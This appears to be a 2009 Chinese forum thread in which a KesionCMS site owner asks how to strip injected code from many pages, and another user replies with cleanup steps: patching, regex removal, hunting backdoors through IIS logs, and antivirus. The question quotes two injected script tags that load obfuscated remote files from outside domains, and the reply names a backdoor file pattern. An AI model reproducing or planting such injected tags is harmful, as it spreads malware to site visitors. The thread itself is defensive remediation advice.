账号通
    

账号  

密码  

1713

查看

2

回复
主题:我全站很多页面被塞了代码,而且都不一样,请问怎么才能一下子全部清除光! [收藏主题]  
razxy 当前离线

204

主题

0

广播

2

粉丝
添加关注
级别:二年级

用户积分:2839 分
登录次数:353 次
注册时间:2007/8/3
最后登录:2016/6/20
razxy 发表于:2009/9/17 15:23:00   | 只看该作者 查看该作者主题 楼主 
做在线知识付费 选科汛云开店

<script language="JavaScript" src="http://www.cuaa.net/%6De%6Dber/%6De%6Dber/file/ruxin.js" type="text/javascript" id="seraph5script5134"  ></script>

<script type="text/javascript" language="JavaScript" src="http://www.%69cxxw.com/%69mages/logo.swf" id="seraph6script2864"  ></script>

 

就是如此类代码,而且很多不一样,按我想也有规律可找,请问怎么样才能一次性全部清除呢?

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
cn450041399 当前离线

119

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:763 分
登录次数:35 次
注册时间:2008/6/30
最后登录:2014/2/22
cn450041399 发表于:2009/9/17 21:32:00   | 只看该作者 查看该作者主题 沙发 
科汛在线考试系统(NET)
楼上的还方法还真好! 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
abc1988 当前离线

195

主题

0

广播

5

粉丝
添加关注
级别:一年级

用户积分:3004 分
登录次数:313 次
注册时间:2007/11/10
最后登录:2011/6/13
abc1988 发表于:2009/9/17 20:17:00   | 只看该作者 查看该作者主题 藤椅 
科汛在线考试系统(NET)

总结一下网站挂马后的解决方法,1、下载补丁(包括windows升级补丁和科汛官方补丁),2、快速替换还原页面,3、搜索隐藏后门文件,4、系统最好能杀一下毒。

具体操作:

一、补丁

下载一个360奇虎安全卫士,如果嫌服务器安装麻烦,可以下载绿色版,点击查杀木马,系统漏洞补丁,下载更新和安装,重启服务器。下载科汛官方6.0SP1补丁,如果你没有修改太多文件,可以备份好TEMPLATE后,直接整个目录删除后,重新上传科汛系统或补丁。5.5的修改upfilesave.asp文件或官方补丁,6.0SP1直接补就可以了。注意设置upfiles的脚本运行权限:无。论坛之前有指导为对着upfiles目录按右键设置,有些服务器系统找不到这个选项设置,可以在iis里面对着这个目录右键就有这个设置了。

二、替换还原

最终解决方法如下:三分钟搞定替换还原中马页面。首先下载ultraedit32软件,有绿色版的,14.20之类版本均可。

ultraedit点搜索,在文件中替换,选ultraedit正则,包含子目录:

搜索文档类型:*.asp;*.htm;*.html;*.js;

分别使用2次下面的正则,

第一正则:document.writeln('<script*seraph*><\/script>');
第二正则:<script*seraph*></script>


2次替换后中马页面统统恢复,不用谢我,好东西一起分享!

 

三、查后门


被充一句,在线木马检测程序是找不到这种木马的,查找IIS日志方法:先查help.asp得出执行过help.asp;.jpg文件的所有IP地址,再利用查出的IP地址查出执行过的操作,浏览这些被操作过的文件是否存在200服务响应,如果有说明这些文件是存在的,打开所有系统文件和隐藏文件功能进行查找就一定可以找出木马!删除!


四、有条件安装的话,安装个NOD32、卡巴斯基之类的。 不过部分服务器不适合安装杀毒软件。

五、期待下次挂马,哈!

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.32813秒 powered by KesionCMS 9.0